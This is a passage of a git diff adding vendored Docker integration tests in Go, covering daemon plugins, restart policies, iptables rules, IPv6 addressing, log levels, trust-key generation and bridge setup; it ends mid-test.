+// TestDaemonShutdownWithPlugins shuts down running plugins.
+func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) {
+	testRequires(c, IsAmd64, Network, SameHostDaemon)
+
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
+	}
+
+	defer func() {
+		if err := s.d.Restart(); err != nil {
+			c.Fatalf("Could not restart daemon: %v", err)
+		}
+		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
+			c.Fatalf("Could not disable plugin: %v %s", err, out)
+		}
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil {
+		c.Fatalf("Could not kill daemon: %v", err)
+	}
+
+	for {
+		if err := syscall.Kill(s.d.cmd.Process.Pid, 0); err == syscall.ESRCH {
+			break
+		}
+	}
+
+	cmd := exec.Command("pgrep", "-f", pluginProcessName)
+	if out, ec, err := runCommandWithOutput(cmd); ec != 1 {
+		c.Fatalf("Expected exit code '1', got %d err: %v output: %s ", ec, err, out)
+	}
+
+	s.d.Start("--live-restore")
+	cmd = exec.Command("pgrep", "-f", pluginProcessName)
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+// TestVolumePlugin tests volume creation using a plugin.
+func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	volName := "plugin-volume"
+	destDir := "/tmp/data/"
+	destFile := "foo"
+
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	out, err := s.d.Cmd("plugin", "install", pName, "--grant-all-permissions")
+	if err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
+	}
+	pluginID, err := s.d.Cmd("plugin", "inspect", "-f", "{{.Id}}", pName)
+	pluginID = strings.TrimSpace(pluginID)
+	if err != nil {
+		c.Fatalf("Could not retrieve plugin ID: %v %s", err, pluginID)
+	}
+	mountpointPrefix := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs")
+	defer func() {
+		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
+			c.Fatalf("Could not disable plugin: %v %s", err, out)
+		}
+
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+
+		exists, err := existsMountpointWithPrefix(mountpointPrefix)
+		c.Assert(err, checker.IsNil)
+		c.Assert(exists, checker.Equals, false)
+
+	}()
+
+	out, err = s.d.Cmd("volume", "create", "-d", pName, volName)
+	if err != nil {
+		c.Fatalf("Could not create volume: %v %s", err, out)
+	}
+	defer func() {
+		if out, err := s.d.Cmd("volume", "remove", volName); err != nil {
+			c.Fatalf("Could not remove volume: %v %s", err, out)
+		}
+	}()
+
+	out, err = s.d.Cmd("volume", "ls")
+	if err != nil {
+		c.Fatalf("Could not list volume: %v %s", err, out)
+	}
+	c.Assert(out, checker.Contains, volName)
+	c.Assert(out, checker.Contains, pName)
+
+	mountPoint, err := s.d.Cmd("volume", "inspect", volName, "--format", "{{.Mountpoint}}")
+	if err != nil {
+		c.Fatalf("Could not inspect volume: %v %s", err, mountPoint)
+	}
+	mountPoint = strings.TrimSpace(mountPoint)
+
+	out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "touch", destDir+destFile)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	path := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs", mountPoint, destFile)
+	_, err = os.Lstat(path)
+	c.Assert(err, checker.IsNil)
+
+	exists, err := existsMountpointWithPrefix(mountpointPrefix)
+	c.Assert(err, checker.IsNil)
+	c.Assert(exists, checker.Equals, true)
+}
+
+func (s *DockerDaemonSuite) TestGraphdriverPlugin(c *check.C) {
+	testRequires(c, Network, IsAmd64, DaemonIsLinux, overlay2Supported, ExperimentalDaemon)
+
+	s.d.Start()
+
+	// install the plugin
+	plugin := "cpuguy83/docker-overlay2-graphdriver-plugin"
+	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", plugin)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// restart the daemon with the plugin set as the storage driver
+	s.d.Restart("-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1")
+
+	// run a container
+	out, err = s.d.Cmd("run", "--rm", "busybox", "true") // this will pull busybox using the plugin
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux, Network, IsAmd64)
+
+	s.d.Start("--live-restore=true")
+
+	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	out, err = s.d.Cmd("volume", "create", "--driver", pName, "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	s.d.Restart("--live-restore=true")
+
+	out, err = s.d.Cmd("plugin", "disable", pName)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "in use")
+
+	out, err = s.d.Cmd("volume", "rm", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("plugin", "disable", pName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("plugin", "rm", pName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) {
+	mounts, err := mount.GetMounts()
+	if err != nil {
+		return false, err
+	}
+	for _, mnt := range mounts {
+		if strings.HasPrefix(mnt.Mountpoint, mountpointPrefix) {
+			return true, nil
+		}
+	}
+	return false, nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
new file mode 100644
index 0000000000..3a74fe215f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
@@ -0,0 +1,2988 @@
+// +build linux
+
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"regexp"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/go-units"
+	"github.com/docker/libnetwork/iptables"
+	"github.com/docker/libtrust"
+	"github.com/go-check/check"
+	"github.com/kr/pty"
+)
+
+// TestLegacyDaemonCommand test starting docker daemon using "deprecated" docker daemon
+// command. Remove this test when we remove this.
+func (s *DockerDaemonSuite) TestLegacyDaemonCommand(c *check.C) {
+	cmd := exec.Command(dockerBinary, "daemon", "--storage-driver=vfs", "--debug")
+	err := cmd.Start()
+	c.Assert(err, checker.IsNil, check.Commentf("could not start daemon using 'docker daemon'"))
+
+	c.Assert(cmd.Process.Kill(), checker.IsNil)
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	if out, err := s.d.Cmd("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"); err != nil {
+		c.Fatalf("Could not run top1: err=%v\n%s", err, out)
+	}
+	// --restart=no by default
+	if out, err := s.d.Cmd("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"); err != nil {
+		c.Fatalf("Could not run top2: err=%v\n%s", err, out)
+	}
+
+	testRun := func(m map[string]bool, prefix string) {
+		var format string
+		for cont, shouldRun := range m {
+			out, err := s.d.Cmd("ps")
+			if err != nil {
+				c.Fatalf("Could not run ps: err=%v\n%q", err, out)
+			}
+			if shouldRun {
+				format = "%scontainer %q is not running"
+			} else {
+				format = "%scontainer %q is running"
+			}
+			if shouldRun != strings.Contains(out, cont) {
+				c.Fatalf(format, prefix, cont)
+			}
+		}
+	}
+
+	testRun(map[string]bool{"top1": true, "top2": true}, "")
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatalf("Could not restart daemon: %v", err)
+	}
+	testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ")
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatal(err)
+	}
+
+	if out, err := s.d.Cmd("run", "--name", "volrestarttest1", "-v", "/foo", "busybox"); err != nil {
+		c.Fatal(err, out)
+	}
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil {
+		c.Fatal(err)
+	}
+
+	if out, err := s.d.Cmd("rm", "-fv", "volrestarttest2"); err != nil {
+		c.Fatal(err, out)
+	}
+
+	out, err := s.d.Cmd("inspect", "-f", "{{json .Mounts}}", "volrestarttest1")
+	c.Assert(err, check.IsNil)
+
+	if _, err := inspectMountPointJSON(out, "/foo"); err != nil {
+		c.Fatalf("Expected volume to exist: /foo, error: %v\n", err)
+	}
+}
+
+// #11008
+func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--name", "top1", "--restart", "always", "busybox:latest", "top")
+	c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out))
+
+	out, err = s.d.Cmd("run", "-d", "--name", "top2", "--restart", "unless-stopped", "busybox:latest", "top")
+	c.Assert(err, check.IsNil, check.Commentf("run top2: %v", out))
+
+	testRun := func(m map[string]bool, prefix string) {
+		var format string
+		for name, shouldRun := range m {
+			out, err := s.d.Cmd("ps")
+			c.Assert(err, check.IsNil, check.Commentf("run ps: %v", out))
+			if shouldRun {
+				format = "%scontainer %q is not running"
+			} else {
+				format = "%scontainer %q is running"
+			}
+			c.Assert(strings.Contains(out, name), check.Equals, shouldRun, check.Commentf(format, prefix, name))
+		}
+	}
+
+	// both running
+	testRun(map[string]bool{"top1": true, "top2": true}, "")
+
+	out, err = s.d.Cmd("stop", "top1")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("stop", "top2")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// both stopped
+	testRun(map[string]bool{"top1": false, "top2": false}, "")
+
+	err = s.d.Restart()
+	c.Assert(err, check.IsNil)
+
+	// restart=always running
+	testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ")
+
+	out, err = s.d.Cmd("start", "top2")
+	c.Assert(err, check.IsNil, check.Commentf("start top2: %v", out))
+
+	err = s.d.Restart()
+	c.Assert(err, check.IsNil)
+
+	// both running
+	testRun(map[string]bool{"top1": true, "top2": true}, "After second daemon restart: ")
+
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--name", "test1", "--restart", "on-failure:3", "busybox:latest", "false")
+	c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out))
+
+	// wait test1 to stop
+	hostArgs := []string{"--host", s.d.sock()}
+	err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 10*time.Second, hostArgs...)
+	c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not"))
+
+	// record last start time
+	out, err = s.d.Cmd("inspect", "-f={{.State.StartedAt}}", "test1")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	lastStartTime := out
+
+	err = s.d.Restart()
+	c.Assert(err, check.IsNil)
+
+	// test1 shouldn't restart at all
+	err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 0, hostArgs...)
+	c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not"))
+
+	// make sure test1 isn't restarted when daemon restart
+	// if "StartAt" time updates, means test1 was once restarted.
+	out, err = s.d.Cmd("inspect", "-f={{.State.StartedAt}}", "test1")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	c.Assert(out, checker.Equals, lastStartTime, check.Commentf("test1 shouldn't start after daemon restarts"))
+}
+
+func (s *DockerDaemonSuite) TestDaemonStartIptablesFalse(c *check.C) {
+	if err := s.d.Start("--iptables=false"); err != nil {
+		c.Fatalf("we should have been able to start the daemon with passing iptables=false: %v", err)
+	}
+}
+
+// Make sure we cannot shrink base device at daemon restart.
+func (s *DockerDaemonSuite) TestDaemonRestartWithInvalidBasesize(c *check.C) {
+	testRequires(c, Devicemapper)
+	c.Assert(s.d.Start(), check.IsNil)
+
+	oldBasesizeBytes := s.d.getBaseDeviceSize(c)
+	var newBasesizeBytes int64 = 1073741824 //1GB in bytes
+
+	if newBasesizeBytes < oldBasesizeBytes {
+		err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes))
+		c.Assert(err, check.IsNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err))
+	}
+	c.Assert(s.d.Stop(), check.IsNil)
+}
+
+// Make sure we can grow base device at daemon restart.
+func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) {
+	testRequires(c, Devicemapper)
+	c.Assert(s.d.Start(), check.IsNil)
+
+	oldBasesizeBytes := s.d.getBaseDeviceSize(c)
+
+	var newBasesizeBytes int64 = 53687091200 //50GB in bytes
+
+	if newBasesizeBytes < oldBasesizeBytes {
+		c.Skip(fmt.Sprintf("New base device size (%v) must be greater than (%s)", units.HumanSize(float64(newBasesizeBytes)), units.HumanSize(float64(oldBasesizeBytes))))
+	}
+
+	err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes))
+	c.Assert(err, check.IsNil, check.Commentf("we should have been able to start the daemon with increased base device size: %v", err))
+
+	basesizeAfterRestart := s.d.getBaseDeviceSize(c)
+	newBasesize, err := convertBasesize(newBasesizeBytes)
+	c.Assert(err, check.IsNil, check.Commentf("Error in converting base device size: %v", err))
+	c.Assert(newBasesize, check.Equals, basesizeAfterRestart, check.Commentf("Basesize passed is not equal to Basesize set"))
+	c.Assert(s.d.Stop(), check.IsNil)
+}
+
+// Issue #8444: If docker0 bridge is modified (intentionally or unintentionally) and
+// no longer has an IP associated, we should gracefully handle that case and associate
+// an IP with it rather than fail daemon start
+func (s *DockerDaemonSuite) TestDaemonStartBridgeWithoutIPAssociation(c *check.C) {
+	// rather than depending on brctl commands to verify docker0 is created and up
+	// let's start the daemon and stop it, and then make a modification to run the
+	// actual test
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	if err := s.d.Stop(); err != nil {
+		c.Fatalf("Could not stop daemon: %v", err)
+	}
+
+	// now we will remove the ip from docker0 and then try starting the daemon
+	ipCmd := exec.Command("ip", "addr", "flush", "dev", "docker0")
+	stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd)
+	if err != nil {
+		c.Fatalf("failed to remove docker0 IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr)
+	}
+
+	if err := s.d.Start(); err != nil {
+		warning := "**WARNING: Docker bridge network in bad state--delete docker0 bridge interface to fix"
+		c.Fatalf("Could not start daemon when docker0 has no IP address: %v\n%s", err, warning)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonIptablesClean(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil {
+		c.Fatalf("Could not run top: %s, %v", out, err)
+	}
+
+	// get output from iptables with container running
+	ipTablesSearchString := "tcp dpt:80"
+	ipTablesCmd := exec.Command("iptables", "-nvL")
+	out, _, err := runCommandWithOutput(ipTablesCmd)
+	if err != nil {
+		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
+	}
+
+	if !strings.Contains(out, ipTablesSearchString) {
+		c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out)
+	}
+
+	if err := s.d.Stop(); err != nil {
+		c.Fatalf("Could not stop daemon: %v", err)
+	}
+
+	// get output from iptables after restart
+	ipTablesCmd = exec.Command("iptables", "-nvL")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	if err != nil {
+		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
+	}
+
+	if strings.Contains(out, ipTablesSearchString) {
+		c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, out)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	if out, err := s.d.Cmd("run", "-d", "--name", "top", "--restart=always", "-p", "80", "busybox:latest", "top"); err != nil {
+		c.Fatalf("Could not run top: %s, %v", out, err)
+	}
+
+	// get output from iptables with container running
+	ipTablesSearchString := "tcp dpt:80"
+	ipTablesCmd := exec.Command("iptables", "-nvL")
+	out, _, err := runCommandWithOutput(ipTablesCmd)
+	if err != nil {
+		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
+	}
+
+	if !strings.Contains(out, ipTablesSearchString) {
+		c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out)
+	}
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatalf("Could not restart daemon: %v", err)
+	}
+
+	// make sure the container is not running
+	runningOut, err := s.d.Cmd("inspect", "--format={{.State.Running}}", "top")
+	if err != nil {
+		c.Fatalf("Could not inspect on container: %s, %v", out, err)
+	}
+	if strings.TrimSpace(runningOut) != "true" {
+		c.Fatalf("Container should have been restarted after daemon restart. Status running should have been true but was: %q", strings.TrimSpace(runningOut))
+	}
+
+	// get output from iptables after restart
+	ipTablesCmd = exec.Command("iptables", "-nvL")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	if err != nil {
+		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
+	}
+
+	if !strings.Contains(out, ipTablesSearchString) {
+		c.Fatalf("iptables output after restart should have contained %q, but was %q", ipTablesSearchString, out)
+	}
+}
+
+// TestDaemonIPv6Enabled checks that when the daemon is started with --ipv6=true that the docker0 bridge
+// has the fe80::1 address and that a container is assigned a link-local address
+func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) {
+	testRequires(c, IPv6)
+
+	setupV6(c)
+	defer teardownV6(c)
+
+	if err := s.d.StartWithBusybox("--ipv6"); err != nil {
+		c.Fatal(err)
+	}
+
+	iface, err := net.InterfaceByName("docker0")
+	if err != nil {
+		c.Fatalf("Error getting docker0 interface: %v", err)
+	}
+
+	addrs, err := iface.Addrs()
+	if err != nil {
+		c.Fatalf("Error getting addresses for docker0 interface: %v", err)
+	}
+
+	var found bool
+	expected := "fe80::1/64"
+
+	for i := range addrs {
+		if addrs[i].String() == expected {
+			found = true
+			break
+		}
+	}
+
+	if !found {
+		c.Fatalf("Bridge does not have an IPv6 Address")
+	}
+
+	if out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest"); err != nil {
+		c.Fatalf("Could not run container: %s, %v", out, err)
+	}
+
+	out, err := s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.Networks.bridge.LinkLocalIPv6Address}}'", "ipv6test")
+	out = strings.Trim(out, " \r\n'")
+
+	if err != nil {
+		c.Fatalf("Error inspecting container: %s, %v", out, err)
+	}
+
+	if ip := net.ParseIP(out); ip == nil {
+		c.Fatalf("Container should have a link-local IPv6 address")
+	}
+
+	out, err = s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}'", "ipv6test")
+	out = strings.Trim(out, " \r\n'")
+
+	if err != nil {
+		c.Fatalf("Error inspecting container: %s, %v", out, err)
+	}
+
+	if ip := net.ParseIP(out); ip != nil {
+		c.Fatalf("Container should not have a global IPv6 address: %v", out)
+	}
+}
+
+// TestDaemonIPv6FixedCIDR checks that when the daemon is started with --ipv6=true and a fixed CIDR
+// that running containers are given a link-local and global IPv6 address
+func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) {
+	// IPv6 setup is messing with local bridge address.
+	testRequires(c, SameHostDaemon)
+	setupV6(c)
+	defer teardownV6(c)
+
+	err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not start daemon with busybox: %v", err))
+
+	out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err))
+
+	out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}", "ipv6test")
+	out = strings.Trim(out, " \r\n'")
+
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	ip := net.ParseIP(out)
+	c.Assert(ip, checker.NotNil, check.Commentf("Container should have a global IPv6 address"))
+
+	out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.IPv6Gateway}}", "ipv6test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:2::100", check.Commentf("Container should have a global IPv6 gateway"))
+}
+
+// TestDaemonIPv6FixedCIDRAndMac checks that when the daemon is started with ipv6 fixed CIDR
+// the running containers are given an IPv6 address derived from the MAC address and the ipv6 fixed CIDR
+func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) {
+	// IPv6 setup is messing with local bridge address.
+	testRequires(c, SameHostDaemon)
+	setupV6(c)
+	defer teardownV6(c)
+
+	err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:1::/64")
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "--mac-address", "AA:BB:CC:DD:EE:FF", "busybox")
+	c.Assert(err, checker.IsNil)
+
+	out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}", "ipv6test")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:1::aabb:ccdd:eeff")
+}
+
+func (s *DockerDaemonSuite) TestDaemonLogLevelWrong(c *check.C) {
+	c.Assert(s.d.Start("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level"))
+}
+
+func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) {
+	if err := s.d.Start("--log-level=debug"); err != nil {
+		c.Fatal(err)
+	}
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	if !strings.Contains(string(content), `level=debug`) {
+		c.Fatalf(`Missing level="debug" in log file:\n%s`, string(content))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonLogLevelFatal(c *check.C) {
+	// we creating new daemons to create new logFile
+	if err := s.d.Start("--log-level=fatal"); err != nil {
+		c.Fatal(err)
+	}
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	if strings.Contains(string(content), `level=debug`) {
+		c.Fatalf(`Should not have level="debug" in log file:\n%s`, string(content))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonFlagD(c *check.C) {
+	if err := s.d.Start("-D"); err != nil {
+		c.Fatal(err)
+	}
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	if !strings.Contains(string(content), `level=debug`) {
+		c.Fatalf(`Should have level="debug" in log file using -D:\n%s`, string(content))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonFlagDebug(c *check.C) {
+	if err := s.d.Start("--debug"); err != nil {
+		c.Fatal(err)
+	}
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	if !strings.Contains(string(content), `level=debug`) {
+		c.Fatalf(`Should have level="debug" in log file using --debug:\n%s`, string(content))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonFlagDebugLogLevelFatal(c *check.C) {
+	if err := s.d.Start("--debug", "--log-level=fatal"); err != nil {
+		c.Fatal(err)
+	}
+	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	if !strings.Contains(string(content), `level=debug`) {
+		c.Fatalf(`Should have level="debug" in log file when using both --debug and --log-level=fatal:\n%s`, string(content))
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) {
+	listeningPorts := [][]string{
+		{"0.0.0.0", "0.0.0.0", "5678"},
+		{"127.0.0.1", "127.0.0.1", "1234"},
+		{"localhost", "127.0.0.1", "1235"},
+	}
+
+	cmdArgs := make([]string, 0, len(listeningPorts)*2)
+	for _, hostDirective := range listeningPorts {
+		cmdArgs = append(cmdArgs, "--host", fmt.Sprintf("tcp://%s:%s", hostDirective[0], hostDirective[2]))
+	}
+
+	if err := s.d.StartWithBusybox(cmdArgs...); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	for _, hostDirective := range listeningPorts {
+		output, err := s.d.Cmd("run", "-p", fmt.Sprintf("%s:%s:80", hostDirective[1], hostDirective[2]), "busybox", "true")
+		if err == nil {
+			c.Fatalf("Container should not start, expected port already allocated error: %q", output)
+		} else if !strings.Contains(output, "port is already allocated") {
+			c.Fatalf("Expected port is already allocated error: %q", output)
+		}
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) {
+	// TODO: skip or update for Windows daemon
+	os.Remove("/etc/docker/key.json")
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	s.d.Stop()
+
+	k, err := libtrust.LoadKeyFile("/etc/docker/key.json")
+	if err != nil {
+		c.Fatalf("Error opening key file")
+	}
+	kid := k.KeyID()
+	// Test Key ID is a valid fingerprint (e.g. QQXN:JY5W:TBXI:MK3X:GX6P:PD5D:F56N:NHCS:LVRZ:JA46:R24J:XEFF)
+	if len(kid) != 59 {
+		c.Fatalf("Bad key ID: %s", kid)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonKeyMigration(c *check.C) {
+	// TODO: skip or update for Windows daemon
+	os.Remove("/etc/docker/key.json")
+	k1, err := libtrust.GenerateECP256PrivateKey()
+	if err != nil {
+		c.Fatalf("Error generating private key: %s", err)
+	}
+	if err := os.MkdirAll(filepath.Join(os.Getenv("HOME"), ".docker"), 0755); err != nil {
+		c.Fatalf("Error creating .docker directory: %s", err)
+	}
+	if err := libtrust.SaveKey(filepath.Join(os.Getenv("HOME"), ".docker", "key.json"), k1); err != nil {
+		c.Fatalf("Error saving private key: %s", err)
+	}
+
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	s.d.Stop()
+
+	k2, err := libtrust.LoadKeyFile("/etc/docker/key.json")
+	if err != nil {
+		c.Fatalf("Error opening key file")
+	}
+	if k1.KeyID() != k2.KeyID() {
+		c.Fatalf("Key not migrated")
+	}
+}
+
+// GH#11320 - verify that the daemon exits on failure properly
+// Note that this explicitly tests the conflict of {-b,--bridge} and {--bip} options as the means
+// to get a daemon init failure; no other tests for -b/--bip conflict are therefore required
+func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) {
+	//attempt to start daemon with incorrect flags (we know -b and --bip conflict)
+	if err := s.d.Start("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil {
+		//verify we got the right error
+		if !strings.Contains(err.Error(), "Daemon exited") {
+			c.Fatalf("Expected daemon not to start, got %v", err)
+		}
+		// look in the log and make sure we got the message that daemon is shutting down
+		runCmd := exec.Command("grep", "Error starting daemon", s.d.LogFileName())
+		if out, _, err := runCommandWithOutput(runCmd); err != nil {
+			c.Fatalf("Expected 'Error starting daemon' message; but doesn't exist in log: %q, err: %v", out, err)
+		}
+	} else {
+		//if we didn't get an error and the daemon is running, this is a failure
+		c.Fatal("Conflicting options should cause the daemon to error out with a failure")
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) {
+	d := s.d
+	err := d.Start("--bridge", "nosuchbridge")
+	c.Assert(err, check.NotNil, check.Commentf("--bridge option with an invalid bridge should cause the daemon to fail"))
+	defer d.Restart()
+
+	bridgeName := "external-bridge"
+	bridgeIP := "192.169.1.1/24"
+	_, bridgeIPNet, _ := net.ParseCIDR(bridgeIP)
+
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	err = d.StartWithBusybox("--bridge", bridgeName)
+	c.Assert(err, check.IsNil)
+
+	ipTablesSearchString := bridgeIPNet.String()
+	ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL")
+	out, _, err = runCommandWithOutput(ipTablesCmd)
+	c.Assert(err, check.IsNil)
+
+	c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true,
+		check.Commentf("iptables output should have contained %q, but was %q",
+			ipTablesSearchString, out))
+
